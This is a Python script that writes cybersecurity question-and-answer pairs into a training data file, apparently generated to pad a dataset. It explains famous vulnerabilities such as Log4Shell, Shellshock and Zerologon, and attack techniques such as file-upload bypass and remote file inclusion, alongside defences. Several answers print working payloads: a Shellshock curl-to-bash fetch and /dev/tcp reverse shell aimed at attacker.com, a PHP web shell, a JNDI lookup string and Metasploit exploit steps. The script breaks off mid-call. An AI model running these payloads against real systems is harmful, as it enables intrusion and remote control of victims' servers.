#!/usr/bin/env python3
"""gen_f_fill8.py -- final push past 1000 cyber pairs for upgrade_f"""
import json, pathlib

OUT = pathlib.Path('/workspace/data_upgrades/upgrade_f.jsonl')
OUT.parent.mkdir(parents=True, exist_ok=True)

pairs = []
def p(q, a):
    pairs.append((q, a))

# ── SHORT Q&A PAIRS (faster to generate many) ────────────────────────────────

p("What is CVE-2021-44228 (Log4Shell) and why was it critical?",
  "Log4Shell: critical RCE vulnerability in Apache Log4j Java logging library; CVSS 10.0; discovered December 2021. Mechanism: Log4j performs JNDI (Java Naming and Directory Interface) lookups when logging strings; attacker-controlled input like ${jndi:ldap://attacker.com/a} logged by application triggers LDAP lookup; attacker-controlled LDAP server returns reference to malicious Java class; application downloads and executes class = RCE. Why critical: Log4j embedded in virtually every Java application (Spring Boot, Elasticsearch, Apache Solr, VMware vCenter, Minecraft servers, countless others); exploit requires only that application logs user input (User-Agent header, login username, search queries) -- minimal requirements; no authentication needed; instant widespread exploitation within 24 hours of disclosure. Impact: data exfiltration, ransomware deployment, cryptomining, botnet recruitment; NSA, CISA, FBI issued emergency guidance; enterprise scramble to patch. Bypass variants: ${${::-j}${::-n}${::-d}${::-i}:...} -- nested substitution to bypass WAF rules; ${jndi:dns://...} for OOB detection; ${jndi:rmi://}, ${jndi:ldaps://}. Fix: Log4j 2.17.1 (JDK >= 8); set log4j2.formatMsgNoLookups=true (partial mitigation); WAF rules to block ${jndi: patterns; network egress controls to block JNDI callback.")

p("What is EternalBlue and how was it used in WannaCry?",
  "EternalBlue (CVE-2017-0144): SMBv1 (Server Message Block version 1) remote code execution vulnerability; originally developed by NSA; leaked by Shadow Brokers in April 2017. Vulnerability: buffer overflow in SMBv1 handling of Transaction2 requests; triggers pool corruption; leads to arbitrary kernel-mode code execution; no authentication required; operates on port 445; wormable (spreads automatically to other vulnerable hosts). WannaCry (May 2017): North Korean APT (Lazarus) used EternalBlue for propagation; infected 200,000+ systems in 150 countries in 48 hours; NHS UK crippled (cancelled operations, diverted ambulances); $4B+ estimated damage; ransomware component encrypted files and demanded Bitcoin. NotPetya (June 2017): followed WannaCry; used EternalBlue + Mimikatz for lateral movement; pseudo-ransomware (no real decryption mechanism); destructive wiper targeting Ukraine; spread globally (Maersk, Merck, FedEx); $10B+ in damages -- most expensive cyberattack in history. Defence: disable SMBv1 (Windows: Set-SmbServerConfiguration -EnableSMBv1 $false); apply MS17-010 patch (released March 2017 -- two months before WannaCry; patched Windows 7/Server 2008; Microsoft released emergency patch for XP/2003 after WannaCry); block port 445 at perimeter and between network segments; network segmentation prevents lateral spread.")

p("What is Heartbleed and how does it work?",
  "Heartbleed (CVE-2014-0160): critical buffer over-read in OpenSSL's TLS heartbeat extension; allowed reading up to 64KB of server memory per request; no authentication required. Heartbeat extension: TLS keep-alive mechanism; client sends heartbeat message with payload (up to 64KB) and length; server echoes payload back; OpenSSL bug: server read length from attacker-controlled field without validating actual payload length; if payload is 1 byte but claimed length is 65535 bytes: server reads 65534 bytes of adjacent memory into response. Memory content: private keys (SSL private key -- game over; attacker can decrypt all past and future traffic with Perfect Forward Secrecy caveat); session tokens (hijack authenticated sessions); passwords typed by users on HTTPS pages; other sensitive memory contents. Scale: affected ~17% of internet HTTPS servers (all using OpenSSL 1.0.1 through 1.0.1f); patch available April 7 2014; mass exploitation before patching. Detection: Heartbleed scanner (systemic scanning tools); Metasploit module; simple Python PoC available within hours of disclosure. Exploitation: send malformed heartbeat; capture response; look for private key markers (BEGIN RSA PRIVATE KEY), session cookies, passwords. Key impact: even if patched, attackers who captured traffic during vulnerable period could decrypt if they stole private key and traffic used RSA key exchange (not PFS). Defence: update OpenSSL to 1.0.1g+; regenerate private keys and certificates (old key potentially compromised); revoke old certificates via CRL/OCSP; invalidate existing sessions (force re-login); enabled HSTS to prevent downgrade.")

p("How does Shellshock work?",
  "Shellshock (CVE-2014-6271, -6277, -6278): critical vulnerability in GNU Bash shell; allowed executing arbitrary commands via specially crafted environment variables; affected servers using Bash to process requests. Mechanism: Bash exports functions in environment variables using format VARNAME=() { commands; }; bug: Bash executed code AFTER the function definition when importing; payload: ENV_VAR=() { ignored; }; /bin/malicious_command; any Bash invocation with attacker-controlled environment variables executes the appended command. Attack vectors: CGI scripts (Common Gateway Interface): web server sets HTTP headers as environment variables then invokes shell script; attacker sends malicious User-Agent or Referer: User-Agent: () { :; }; /usr/bin/curl http://attacker.com/shell.sh | bash; DHCP: DHCP server sends attacker-controlled hostname as environment variable; client runs Bash dhcp-script and executes payload; SSH: if ForceCommand used with attacker-controlled environment (SSH_ORIGINAL_COMMAND variable); SIP, SMTP, OpenVPN. Web exploitation: curl -H 'User-Agent: () { ignored; }; /bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1' http://target.com/cgi-bin/script.cgi -- if CGI script runs bash: reverse shell. Shodan found 500,000+ vulnerable servers in 2014; immediate and widespread exploitation. Defence: update Bash (patches released same day as disclosure); disable CGI scripts not needed; use wsgi/FastCGI instead of CGI (does not use environment variables in same way); Web Application Firewall rules to block Shellshock payloads.")

p("What is PrintNightmare (CVE-2021-1675 / CVE-2021-34527)?",
  "PrintNightmare: critical Windows Print Spooler vulnerability allowing local privilege escalation (LPE) and remote code execution (RCE) on all Windows versions; CVSS 8.8. Two related CVEs: CVE-2021-1675 (LPE) and CVE-2021-34527 (RCE -- more severe). Mechanism: Windows Print Spooler service (spoolsv.exe) runs as SYSTEM; AddPrinterDriverEx() RPC function allows non-admin users to install printer drivers; attacker specifies attacker-controlled DLL as printer driver; DLL loaded by Spooler service = SYSTEM code execution. RCE path: any authenticated domain user can call AddPrinterDriverEx() remotely; specify UNC path to malicious DLL on attacker SMB share; domain user becomes SYSTEM on remote target. Impact: immediate domain compromise if domain controller Spooler service accessible (domain users can trigger on DC = instant domain admin); widely and rapidly exploited by ransomware groups. PoC published on GitHub before Microsoft patch released (accidental disclosure). Exploitation: python3 CVE-2021-1675.py domain/user:pass@DC_IP '\\\\attacker_ip\\share\\malicious.dll'; rpcclient method also works. Defence: disable Print Spooler service on all domain controllers and servers that do not need printing (critical -- DCs never need Spooler); block inbound RPC/SMB from internet; July 2021 patch (KB5004945 and later cumulative updates); restrict access to SpoolersubmitFile; PointAndPrint GPO restriction to only trusted print servers.")

p("What is ProxyLogon and ProxyShell in Microsoft Exchange?",
  "ProxyLogon (CVE-2021-26855): server-side request forgery (SSRF) in Microsoft Exchange; combined with CVE-2021-27065 (post-auth file write) for pre-auth RCE. ProxyLogon SSRF: Exchange exposes /ecp endpoint without authentication; attacker sends X-BEResource cookie with backend target; Exchange forwards request to backend server as SYSTEM-level Exchange server; effectively bypass Exchange authentication. Chain with CVE-2021-27065: use SSRF to write arbitrary file to any path on Exchange server; write ASPX webshell to wwwroot; RCE. Exploitation: 250,000+ Exchange servers exposed; exploited by HAFNIUM (Chinese state actor) as zero-day; mass exploitation began within hours of public disclosure. ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207): three CVE chain; authentication bypass (CVE-2021-34473): URL confusion in IIS allows endpoint access without authentication; privilege escalation (CVE-2021-34523): Exchange PowerShell backend elevates to SYSTEM; RCE (CVE-2021-31207): SYSTEM can write webshell. Exploitation: unauthenticated access to EWS (Exchange Web Services); enumerate mailboxes; write arbitrary files to disk; webshell deployed. Widely exploited by LockFile, Conti, and other ransomware groups in 2021. Metasploit modules available for both. Defence: apply cumulative updates (March 2021 for ProxyLogon; July 2021 for ProxyShell); block external access to /ecp and /owa if not needed; network-level filtering; Exchange on-premises patching critical; Exchange Online (Office 365) not affected (Microsoft manages patching).")

p("What is Spring4Shell (CVE-2022-22965)?",
  "Spring4Shell: critical RCE vulnerability in Spring Framework (Java); CVSS 9.8; exploited in JDK 9+ with Spring MVC or Spring WebFlux apps deployed as WAR to Tomcat. Mechanism: Spring Framework data binding (binding HTTP request parameters to Java objects via Spring's DataBinder); attacker manipulates class.module.classLoader and Tomcat-specific properties to write arbitrary content to Tomcat's logging system; effectively writes JSP webshell to webroot. Requirements: JDK 9 or later (uses module system introduced in Java 9); Spring Framework 5.3.0-5.3.17 or 5.2.0-5.2.19; deployed as WAR file on Apache Tomcat; Spring's data binding must process input from untrusted sources. Exploit: GET /any-spring-endpoint?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di+if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B... (complex parameter chain to write log file as JSP webshell). Impact: less widespread than Log4Shell (more specific conditions required); Spring is extremely popular Java framework; Pivotal/VMware released patches same day as disclosure. Detection: WAF rules blocking class.module.classLoader patterns; Spring Framework security advisories; look for suspicious GET parameters with class., classLoader. substrings. Fix: Spring Framework 5.3.18+; Spring Framework 5.2.20+; Spring Boot 2.6.6, 2.5.12; or apply workaround: configure DataBinder to disallow class.* fields.")

p("How do you exploit MS08-067 (NetAPI)?",
  "MS08-067 (CVE-2008-4250): Windows Server Service RPC remote code execution; unauthenticated; wormable; exploited by Conficker worm (2008); still present in unpatched Windows XP/2003/Vista/2008 in legacy environments and labs. Vulnerability: buffer overflow in NetAPI32.dll's NetpwPathCanonicalize function; called via DCERPC over SMB port 445; no authentication required; reliable exploitation to SYSTEM shell on Windows XP SP0-SP3 and Server 2003 SP1/SP2 (unreliable on later versions). Metasploit: use exploit/windows/smb/ms08_067_netapi; set RHOSTS TARGET_IP; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ATTACKER_IP; exploit; instant SYSTEM shell. Detection check: nmap --script smb-vuln-ms08-067 TARGET_IP (safe check script); auxiliary/scanner/smb/smb_ms08_067 in Metasploit. Historical significance: Conficker worm used this vulnerability; infected 9-15 million computers; largest botnet at time; still found in healthcare, manufacturing (legacy systems never patched). OT/ICS environments: Windows XP/Server 2003 still running process control software; cannot be patched easily; network isolation critical. Defence: patch (MS08-067 update October 2008); disable Windows Server service if not needed; firewall port 445; network segmentation to isolate unpatched legacy systems.")

p("What is the DROWN attack against SSL?",
  "DROWN (Decrypting RSA with Obsolete and Weakened eNcryption, CVE-2016-0800): cross-protocol attack using SSLv2 to break TLS; allows decrypting TLS 1.x traffic that used RSA key exchange. How it works: attacker captures modern TLS 1.x RSA key exchange packets from victim; SSLv2 supports export-grade RSA (512-bit keys, weak cipher); if target server (or any server sharing the same RSA private key) supports SSLv2: attacker sends crafted SSLv2 messages to SSLv2-enabled server; uses server as oracle to crack modern TLS pre-master secret; 2^50 operations (feasible with cloud computing); decrypt captured TLS session. Requirements: victim TLS connections use RSA key exchange (not DHE/ECDHE -- PFS prevents DROWN); server shares RSA key with any SSLv2-enabled server; many organisations shared certificates between web and email servers -- email servers often had SSLv2 enabled. Scale: 33% of HTTPS servers vulnerable in 2016; 11.5 million servers. Defence: disable SSLv2 on ALL servers using same certificate; use separate certificates for separate services; prefer ECDHE cipher suites (PFS -- eliminates RSA key exchange vulnerability); generate new certificates if SSLv2 was ever enabled with current certificate.")

p("Explain the Spectre and Meltdown CPU vulnerabilities.",
  "Meltdown (CVE-2017-5754): transient execution attack; exploits CPU out-of-order execution; unprivileged process reads arbitrary kernel memory. How: modern CPUs speculatively execute instructions before checking if allowed; CPU reads kernel memory speculatively (access check fails, instruction reverted) but data remains in CPU cache; attacker uses cache side-channel (Flush+Reload timing attack) to recover speculatively accessed data; affects Intel and some ARM processors; AMD not affected. KPTI (Kernel Page Table Isolation): Linux mitigation; separate page tables for user and kernel space; significant performance impact (5-30% for system-call-heavy workloads); Windows Meltdown patch similar. Spectre (CVE-2017-5753, CVE-2017-5715): harder to exploit, harder to mitigate; tricks other processes (including kernel) into speculatively executing arbitrary code; attacker reads other process memory via cache side-channel; Spectre variant 1 (bounds check bypass): JavaScript JIT engine speculates past bounds check; attacker array access in browser JavaScript leaks browser process memory; Spectre variant 2 (branch target injection): attacker poisons branch predictor to cause indirect jump to attacker-chosen gadget in victim code; affects Intel, AMD, ARM; multiple variants still being discovered (SpectreRSB, ret2spec, etc.). Browser mitigations: disable SharedArrayBuffer (high-resolution timer for timing attacks); add jitter to performance.now(); site isolation (each site in separate process). Hardware mitigations: Retpoline (return trampoline) for variant 2 in software; microcode updates (IBRS, IBPB, STIBP) for hardware-level mitigations; performance impact variable. Real-world exploitation: cross-privilege (process to kernel) Meltdown readily exploited; cross-process Spectre demonstrated but complex; cloud VMs on shared hardware theoretically vulnerable to cross-VM attacks; Spectre still open research problem.")

p("What is the Zerologon vulnerability (CVE-2020-1472)?",
  "Zerologon: critical flaw in Netlogon Remote Protocol (MS-NRPC); allows unauthenticated attacker with network access to domain controller to set DC computer account password to empty -- effectively instant domain admin. CVSS 10.0. Root cause: Netlogon authentication uses AES-CFB8 (Cipher Feedback 8-bit); implementation uses 16 zero bytes as IV (Initialization Vector) instead of random IV; due to AES-CFB8 properties: sending 256 crafted authentication attempts: statistical probability that 1 in 256 attempts encrypts all zeros to all zeros (because of predictable IV); attacker can make Netlogon authentication succeed without knowing credentials. Exploitation: attacker on network sends 256 crafted Netlogon authentication requests; one succeeds (on average); attacker changes DC machine account password to empty; impersonates DC to other DCs (DCSync equivalent); dumps all password hashes; complete domain compromise in seconds. Tooling: secretsdump.py or dedicated Zerologon PoC; very fast exploitation (5-10 seconds to domain admin). Remediation consideration: changing DC machine account password to empty breaks domain function; Impacket has restorepassword option; careful remediation required. Defence: patch (August 2020 MS20-1472); Microsoft released two-phase response: initial patch (log attacks but allow vulnerable clients for compatibility); February 2021 enforcement mode (block vulnerable clients -- default enforced); emergency patch; also verify no domain controllers still unpatched in estate. Detection: Event 5829 (vulnerable Netlogon connection allowed); Event 5827/5828 (blocked connections) in enforcement mode; spike in Netlogon authentication attempts from non-DC source = Zerologon attempt.")

p("What is the BlueKeep vulnerability (CVE-2019-0708)?",
  "BlueKeep: pre-authentication wormable RCE in Windows Remote Desktop Services (RDS); affects Windows XP, 7, Server 2003, 2008 (not Windows 8, 10, Server 2012+); CVSS 9.8; patched May 2019. Vulnerability: use-after-free in RDP kernel driver (termdd.sys); binding channel specific to RDP negotiation; attacker sends crafted RDP packets; causes UAF condition; arbitrary kernel code execution without authentication; wormable -- spreads from machine to machine automatically. NSA and GCHQ issued urgent warnings comparing to EternalBlue/WannaCry; 950,000+ internet-exposed systems at disclosure; mass exploitation expected but complex exploit reliability (kernel ASLR, heap allocation variability) delayed weaponisation. Metasploit module added October 2019; proof-of-concept caused BSoD more often than shell due to KASLR; full working exploit requires KASLR bypass via information leak or brute force. Related CVEs: DejaBlue (CVE-2019-1181, CVE-2019-1182): same class of vulnerability in RDS affecting Windows 8, 10, Server 2012+ (later versions); also pre-auth; patched August 2019. Defence: apply security patches; disable RDP if not required; do not expose RDP directly to internet (RDP Gateway); Network Level Authentication (NLA) prevents unauthenticated access to vulnerable component (NLA requires authentication before full RDP session established -- mitigates but does not patch); block port 3389 at perimeter; firewall to management networks only.")

p("How do you exploit misconfigured NFS shares?",
  "NFS (Network File System) attack: enumerate and exploit misconfigured NFS exports. Enumeration: showmount -e TARGET_IP (list NFS exports; shows path and who can access: /home *, /backup 10.0.0.0/8); nmap -p 111 --script rpcinfo TARGET_IP (enumerate RPC services including NFS); nmap -p 2049 TARGET_IP (NFS port). Mount: mount -t nfs TARGET_IP:/exported/path /mnt/nfs (mount export; no authentication in NFSv3; NFSv4 adds AUTH_SYS or Kerberos). Common misconfigs: (1) Exported with * (anyone can mount): showmount shows /backup *; mount and read all backup files; find credentials, SSH keys, database dumps. (2) no_root_squash: by default NFS squashes root requests to nobody (UID 65534); if no_root_squash set: attacker's root is root on NFS share; create SUID binary: cp /bin/bash /mnt/nfs/bash; chmod 4755 /mnt/nfs/bash; on server: /mnt/nfs/bash -p (if server mounts same share); SUID binary runs as root. (3) insecure: NFS uses privileged port (1-1023) by default; if insecure allows high ports too: clients don't need privileged access to mount. (4) NFSv2/NFSv3 without Kerberos: no authentication; access based on IP/hostname in exports file; spoof IP to bypass restriction. UID manipulation: NFS trusts UID from client; create local user with UID matching remote user (UID 1000 = bob): useradd -u 1000 fake_bob; sudo -u fake_bob ls /mnt/nfs -- accesses files owned by UID 1000 on server as if bob. Defence: restrict exports to specific IPs/subnets (never *); use root_squash (default); use NFSv4 with Kerberos authentication; firewall ports 111 and 2049 to authorised clients; audit export configs: cat /etc/exports.")

p("What is DNS rebinding and how does it work?",
  "DNS rebinding: attacker-controlled domain initially resolves to legitimate external IP (passes browser SOP check) then rebinds to internal IP target; browser then allows JavaScript to make requests to what it thinks is same origin. Step by step: (1) Victim's browser loads attacker page at evil.com; DNS resolves evil.com to attacker IP (43.x.x.x); page loads attacker JavaScript. (2) Attacker sets evil.com DNS TTL=1 second; quickly switches DNS to resolve evil.com to internal target IP (192.168.1.1). (3) JavaScript on attacker page makes fetch(http://evil.com/); browser thinks same origin (evil.com:80 = evil.com:80 = SOP satisfied); DNS re-resolves evil.com to 192.168.1.1; request goes to internal router admin panel. (4) JavaScript reads response; exfiltrates router admin page content or makes state-changing requests (change DNS settings, add admin user). Impact: bypass same-origin policy for internal service access; access admin interfaces not exposed to internet; access cloud metadata (169.254.169.254); extract credentials from internal applications; port scan internal network from victim browser. Requirements: victim must keep page open long enough for TTL expiry; browser may cache DNS response (some browsers ignore TTL lower bound); need to know or guess internal IP of target. Tools: Singularity of Origin (automated DNS rebinding tool); BurpSuite-based rebinding for testing; HostnameInjector extension. Mitigations: DNS-based: rebinding protection at DNS resolver level (block resolution of public domains to private IPs); private DNS resolvers reject RFC1918 responses for external domains; Kubernetes CoreDNS has rebinding protection. Application: use Host header validation (reject requests where Host is not in expected whitelist); internal services should not trust Host header from internet. Browser: Chrome since 2022 blocks private IP access without explicit permission (CORS Private Network Access); Firefox plans similar.")

p("How do you bypass two-factor authentication?",
  "2FA bypass techniques: (1) Phishing with real-time relay: attacker creates fake login page; victim enters credentials AND 2FA code; attacker relays to real site in real-time (Evilginx, Modlishka, Muraena reverse proxies); session cookie captured after successful auth; victim's full authenticated session stolen; TOTP codes valid for 30 seconds -- sufficient for real-time relay. (2) SIM swapping: social engineer mobile carrier to transfer victim phone number to attacker SIM; intercept SMS 2FA codes; effective against SMS-based 2FA; defence: use authenticator app or hardware key instead of SMS. (3) SS7 attack: exploit Signalling System 7 telecom protocol vulnerabilities; intercept SMS messages at carrier level without SIM swap; requires carrier-level access or exploit (nation-state or well-resourced criminal). (4) Account recovery bypass: many sites have 2FA but weak account recovery (security questions, email-only recovery); bypass 2FA by triggering recovery flow that doesn't require 2FA; test recovery options for 2FA bypass. (5) Brute force TOTP: TOTP codes are 6 digits = 1 million combinations; if no rate limiting on 2FA code entry; attack window = 30-second code validity; with fast brute force: try all 1 million codes per 30s window (challenging but theoretically possible without lockout). (6) Leaked codes: TOTP secret leaked (app backup, QR code photo, database breach with TOTP secret); attacker generates valid codes from stolen secret indefinitely. (7) OAuth/SSO bypass: if site allows login via third-party (Google, Facebook) without 2FA enforced on SSO path; enable SSO login bypass to avoid 2FA. (8) Older API version: mobile app v1 API endpoint may not enforce 2FA while web frontend does; test all API versions. (9) Response manipulation: some implementations only check 2FA result client-side; intercept response and change {mfaRequired:true} to {mfaRequired:false} in Burp. Defence: FIDO2/WebAuthn hardware keys (phishing-resistant; relay attacks fail because authentication bound to domain); enforce 2FA on ALL authentication paths including API and recovery; no SMS 2FA for high-value accounts.")

p("What is SAML and what are common SAML vulnerabilities?",
  "SAML (Security Assertion Markup Language): XML-based standard for SSO (Single Sign-On) authentication; identity provider (IdP) authenticates user and issues signed XML assertion; service provider (SP) validates assertion and grants access. Flow: user accesses SP; SP redirects to IdP; user authenticates at IdP; IdP issues signed SAML assertion (XML containing NameID = username, attributes, validity period); returned to SP via POST (browser redirect); SP validates signature and grants access. Common vulnerabilities: (1) XML signature wrapping (XSW): SAML response is signed XML; attacker manipulates XML structure without invalidating signature; add malicious unsigned assertion alongside legitimate signed assertion; SP processes unsigned malicious assertion thinking signature covers it; effectively change NameID to another user = account takeover. Multiple XSW variants. (2) Signature validation missing: SP does not validate signature at all; any crafted assertion accepted; change NameID to admin; complete authentication bypass. (3) Signature algorithm confusion: SP accepts MD5 or SHA1 signatures; collision attack to forge assertion; recommendation: require SHA256+. (4) XXE in SAML: SAML is XML; if SP's XML parser processes external entities; assertion may trigger XXE when parsed. (5) XML canonicalisation issues: XML canonicalisation normalises XML before signing; edge cases in normalisation allow manipulation. (6) Comment injection: inject XML comment inside NameID: admin<!-->attacker</NameID>; some parsers strip comments, signature validates, SP reads NameID as admin while original has comment. (7) Replay attack: SAML assertion has validity window (NotBefore, NotOnOrAfter); if SP does not track used assertion IDs: replay valid assertion. Testing: SAML Raider (Burp extension); intercept SAML response in Burp; decode base64; analyse XML; modify NameID; re-sign with attacker key; check if SP validates signature correctly. SAML Hacking Tools: samltool.com (online SAML decoder/encoder); SAMLExtractor; SAML Raider Burp extension.")

p("How do you bypass file type restrictions in web applications?",
  "File type restriction bypass: applications restrict uploaded file types to prevent malicious uploads. Detection mechanisms and bypasses: (1) Client-side validation: JavaScript checks extension before upload; bypass by disabling JS in browser or intercept request with Burp after client-side check passes; change filename in intercepted request. (2) Extension check: server checks extension only; rename webshell.php to webshell.php.jpg; some servers execute based on extension; or blacklist missing .php5, .phtml, .phar, .php7; try all variants. (3) Content-Type check: server checks Content-Type header; change Content-Type: application/x-php to Content-Type: image/jpeg in Burp; server may accept without checking actual content. (4) Magic bytes check: server reads first bytes of file for file signature; prepend GIF header (GIF89a;) before PHP code: GIF89a;<?php system($_GET[cmd]); ?>; looks like GIF to magic byte check but PHP parser executes code. (5) Image processing: if server processes image (resize, thumbnail): use polyglot -- valid image file that also contains PHP code; JPEG/PNG files can have PHP code embedded in EXIF data or in file body without corrupting image structure; ExifTool to inject: exiftool -Comment='<?php system($_GET[cmd]); ?>' image.jpg. (6) MIME sniffing: Internet Explorer MIME sniffing executes HTML in image if uploaded to same domain and loaded without X-Content-Type-Options header; less relevant in modern browsers. (7) Double extension: file.php.jpg -- if web server configured to parse PHP regardless of secondary extension: AddHandler application/x-httpd-php .php in Apache per-directory; or .htaccess upload: AddType application/x-httpd-php .jpg. (8) IIS parsing: old IIS: /uploads/test.jpg/anything.asp -- IIS executes as ASP if URL ends in .asp; semicolon: test.asp;.jpg on old IIS. (9) Null byte injection: file.php%00.jpg -- if server uses C function for extension check: null terminates string; sees .php as extension; (fixed in PHP 5.3.4+ but found in legacy systems).")

p("What is RFI (Remote File Inclusion) and how is it exploited?",
  "Remote File Inclusion: web application includes files from remote URLs based on user input; attacker hosts malicious file; server fetches and executes it. Requirements: allow_url_include = On in PHP configuration (disabled by default since PHP 5.2; enabled only if explicitly configured); allow_url_fopen = On (default On); parameter passed to include/require function without sanitisation. Basic exploitation: vulnerable code: include($_GET[page]); attacker sends: ?page=http://attacker.com/shell.php; PHP fetches http://attacker.com/shell.php; executes code on server. Attacker-hosted file (shell.php): <?php system($_GET[cmd]); ?>. With RFI: instant RCE; no need for path traversal complexity. Data URI wrapper (if allow_url_include On): ?page=data:text/plain,<?php system($_GET[cmd]); ?> (inline PHP code without external HTTP request); useful when outbound HTTP filtered. PHP FTP wrapper: ?page=ftp://attacker.com/shell.php (if FTP available). Testing: inject http://attacker.com/test.txt (unique URL to Burp Collaborator); check Collaborator for HTTP request from server; confirms RFI without needing allow_url_include; if DNS-only request: server resolves domain but may not fetch over HTTP (DNS RFI detection useful for mapping). Difference from SSRF: SSRF: server makes HTTP request; response returned to attacker or used internally. RFI: server fetches file AND executes its contents (code execution). Defense: disable allow_url_include (critical); input validation (whitelist allowed filenames or paths); do not pass user input to include/require; use parameterised file loading (switch/case for known files); open_basedir restriction prevents including files outside web root.")

p("How do you find vulnerabilities in authentication mechanisms?",
  "Authentication vulnerability testing checklist: (1) Username enumeration: register/forgot password with existing vs non-existing username; different error message or response time reveals valid usernames; timing attack on bcrypt (valid username hashes password, invalid skips -- different timing). (2) Default credentials: try admin/admin, admin/password, admin/1234, test/test, user/user; check application documentation for default credentials. (3) Brute force: attempt login repeatedly; check for: account lockout (after 5 failures?); rate limiting (429 Too Many Requests?); CAPTCHA (bypassable?); lockout scope (lockout by username, IP, or session -- IP lockout bypassed with X-Forwarded-For; session lockout reset by new session). (4) Weak password policy: test passwords: abc123, password, 12345678; note minimum complexity requirements; try passwords from previous breaches (HaveIBeenPwned integration?). (5) Credential stuffing protection: automated defence (bot detection, CAPTCHA, rate limiting); test with tools (Hydra). (6) Forgot password flow: is reset token random and unique? Long enough (min 32 chars)? Short TTL (expire after 1 hour)? Single use? Token in URL (Referer leakage) or POST body? Can attacker request reset for any account and reset to known email? (7) Session management: is session token cryptographically random? Long enough? Rotated after login (session fixation prevention)? Invalidated on logout? Proper cookie attributes (Secure, HttpOnly, SameSite)? Concurrent session handling. (8) Remember me / persistent login: is persistent token stored securely? Long-lived token entropically strong? Invalidated on logout? (9) Social login: OAuth implementation vulnerabilities (see OAuth section). (10) Multi-tenancy: can user from tenant A access tenant B? Tenant ID in session or JWT -- tamper? Tools: Burp Intruder for brute force; FFUF; Hydra; Wordlists: SecLists (common-credentials).")

p("What are common misconfigurations in web servers (Apache, Nginx)?",
  "Web server misconfiguration vulnerabilities: Apache: (1) Directory listing: Options Indexes enabled; http://target.com/files/ lists all files; find source code, backups, configuration files; disable with Options -Indexes in httpd.conf. (2) .htaccess traversal: expose .htaccess files: curl http://target.com/.htaccess -- may reveal URL rewriting rules, authentication configs, PHP settings. (3) ModStatus: http://target.com/server-status exposed publicly; shows active requests, process info, worker status; disable or restrict by IP: <Location /server-status> Require local </Location>. (4) PHP settings: display_errors = On (verbose error messages reveal paths, database info); expose_php = On (X-Powered-By header reveals PHP version). (5) Improper SSI (Server Side Includes): SSI enabled on writable directory; upload .shtml file with <!--#exec cmd=id --> for RCE. (6) AddHandler misconfiguration: AddHandler application/x-httpd-php .php .jpg -- executes uploaded JPEG as PHP. Nginx: (1) Off-by-slash path traversal: location /files { alias /home/user/files; } (no trailing slash on alias); request to /files../etc/passwd reads /home/user/files../etc/passwd = /home/user/etc/passwd (one level up -- traversal). (2) Try_files misuse: try_files $uri $uri/ =404 -- if URI can include null bytes or path traversal components and try_files resolves them: potential traversal. (3) Expose hidden files: location ~* /\. { deny all; } missing; http://target.com/.git/config exposed (common on development servers deployed to production with Git). Both servers: (4) Verbose error pages: stack traces, file paths, database connection strings in error pages; disable custom error pages. (5) Backup files: http://target.com/index.php.bak or /index.php~ (vim backup) or /index.php.orig accessible; contains source code. (6) HTTP methods: TRACE method enabled: HTTP response includes request headers; used in cross-site tracing (XST) for cookie theft (historical, modern browsers block). Testing: Nikto (automated web server misconfiguration scanner); DirBuster/Gobuster for file enumeration; Shodan for internet-exposed server-status pages.")

p("What is the difference between authorization and authentication?",
  "Authentication vs Authorization (AuthN vs AuthZ): Authentication (AuthN): who are you? Verify identity; proves claimant is who they say they are. Methods: something you know (password, PIN); something you have (OTP token, hardware key, smart card); something you are (biometric -- fingerprint, face); multi-factor (MFA) combines two or more factors. Examples: login with username/password; certificate-based authentication; SAML/OAuth SSO. Authorization (AuthZ): what are you allowed to do? Controls access to resources based on authenticated identity; happens AFTER authentication. Models: DAC (Discretionary Access Control): resource owner controls access; standard file system permissions. MAC (Mandatory Access Control): system enforces labels (Top Secret, Secret, Confidential); Bell-LaPadula model; military systems. RBAC (Role-Based Access Control): permissions assigned to roles; users assigned roles; most common in enterprise applications (admin role, read-only role). ABAC (Attribute-Based Access Control): policies based on user attributes, resource attributes, environment; fine-grained; (User.department = Finance AND Resource.classification = Internal AND Time = BusinessHours). Zero Trust: never trust, always verify; both authentication AND authorization required for every access attempt; continuous verification. Common vulnerabilities: Broken Authentication: bypass authentication; Broken Access Control (IDOR, privilege escalation): authentication succeeded but authorization failed; user accesses resources they are authenticated for but not authorized for. Web applications: session token proves authentication; subsequent authorization checks must verify that authenticated user has permission for each action (not just that they are logged in). OWASP Top 10: A01 2021 Broken Access Control, A07 Identification and Authentication Failures -- both in top 10 reflecting importance.")

p("How do you test APIs for security vulnerabilities using Postman?",
  '''Postman for API security testing: Postman: API collaboration and testing platform; useful for security testing when Burp Suite not available or for scripting automated security checks. Setup: import API collection (OpenAPI/Swagger spec: File > Import; or record traffic via Postman Proxy); organise requests by functionality. Authentication: configure authentication at collection level; bearer tokens, API keys, OAuth2 flow; environment variables for tokens (avoid hardcoding). Manual security testing: IDOR: parameterise resource IDs; use Postman variables; manually change user_id to other user ID; check response. Authentication bypass: remove Authorization header; change to different user token; expired token; malformed token. Input validation: add special characters to all string fields: apostrophes, angle brackets, semicolons, template expressions; check response for errors, reflections, injection. Mass assignment: add extra fields to POST/PUT body: role, admin, verified, balance; check if server accepts and applies them. Rate limiting: use Postman Runner to send 100 identical requests rapidly; observe if rate limiting triggered. Scripting: Postman Tests tab (JavaScript): pm.test with pm.response.to.have.status(200); security-specific tests for stack trace absence and sensitive data absence in error responses. Collection Runner: run all requests in collection automatically; check all pass security tests. Newman: CLI runner for Postman collections; newman run collection.json --environment env.json; integrate into CI/CD; run security tests on every deployment. Limitations vs Burp: Postman not designed for fuzzing (Burp Intruder better); Postman cannot intercept/modify browser requests (need Burp for web app testing); Postman better for API-first testing with known endpoints.''')

p("What are the key elements of a penetration test report executive summary?",
